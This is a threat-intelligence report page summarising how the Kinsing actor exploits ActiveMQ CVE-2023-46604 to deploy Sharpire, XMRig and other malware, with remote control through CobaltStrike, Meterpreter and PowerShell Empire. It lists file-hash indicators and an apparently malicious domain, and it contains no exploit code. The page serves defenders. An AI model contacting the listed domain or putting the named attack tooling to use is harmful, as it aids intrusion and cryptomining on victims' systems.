Case of ActiveMQ Vulnerability Exploitation to Install Sharpire (Kinsing)

Oct. 31, 2025, 10:56 a.m.

Description

The Kinsing threat actor continues to distribute malware by exploiting known vulnerabilities, particularly CVE-2023-46604 in ActiveMQ. They target both Linux and Windows systems, using various malware types including XMRig, Stager, and Sharpire. The attack process involves exploiting the ActiveMQ vulnerability to execute remote commands, installing downloaders, and using tools like CobaltStrike, Meterpreter, and PowerShell Empire to control infected systems. The actor's main objectives include cryptocurrency mining, information theft, and potential ransomware installation. The vulnerability has also been exploited by other groups such as Andariel, HelloKitty, and Mauri ransomware. Organizations are advised to apply security updates to mitigate the risk.

External References

https://asec.ahnlab.com/en/90811/
https://otx.alienvault.com/pulse/690481bbc5f17d52a890f470
Tags
xmrig
meterpreter
cobaltstrike
vulnerability exploitation
CVE-2023-46604
cryptocurrency mining
2025-10-31
activemq
sharpire
h2miner
powershell empire

Date

  • Created: Oct. 31, 2025, 9:30 a.m.
  • Published: Oct. 31, 2025, 9:30 a.m.
  • Modified: Oct. 31, 2025, 10:56 a.m.

Indicators

  • 6c2264eadf779f188a04ea5c9b1f9a1a20ab0e86eea6e42af954182ded7dba5d
  • 2559ce9237bf88f3d9d4b51a45211f8d891ab5cd10317d406dc3827d72267ed6
  • 0c748b9e8bc6b5b4fe989df67655f3301d28ef81617b9cbe8e0f6a19d4f9b657
  • gloryweb.vip
Download all indicators here!

Attack Patterns

  • Stager
  • Sharpire
  • CobaltStrike
  • Meterpreter
  • XMrig
  • Kinsing

Additional Informations

  • Korea, Democratic People's Republic of
  • Korea, Republic of

Linked vulnerabilities

CVE-2021-44228

None
Published:

CVE-2023-46604

None
Published: